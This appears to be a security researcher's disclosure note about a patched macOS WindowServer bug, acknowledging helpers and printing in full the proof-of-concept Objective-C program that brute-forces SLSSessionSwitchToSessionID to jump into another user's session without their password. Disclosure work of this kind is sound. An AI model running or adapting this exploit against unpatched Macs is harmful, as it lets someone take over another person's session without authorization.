SkyLight user session exploit
I stumbled on a WindowServer bug allowing any user to switch to another user's session without entering their password. Apple fixed the bug in macOS 11.6.1 and 12.0.1 and paid me a generous bounty.
Bizarrely, the bug reappeared; it was fixed again in macOS 13.6.4 and 14.1.
thanks
ASentientHedgehog and Emma (916253) tested on countless versions and helped me navigate the reporting process. Thank you!code
This is the program I submitted; it just brute-forcesSLSSessionSwitchToSessionID, which lacked the necessary checks. A real attacker would do something cleverer; session IDs are readily available in logs and other APIs.
// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing
@import Foundation;
void SLSSessionSwitchToSessionID(int);
NSDictionary* SLSCopyCurrentSessionDictionary();
extern NSString* kCGSSessionOnConsoleKey;
int main()
{
for(int guess=0;;guess++)
{
NSDictionary* dict=SLSCopyCurrentSessionDictionary();
if([dict[kCGSSessionOnConsoleKey] isEqual:@false])
{
printf("😁\n");
return 0;
}
dict.release;
SLSSessionSwitchToSessionID(guess);
}
}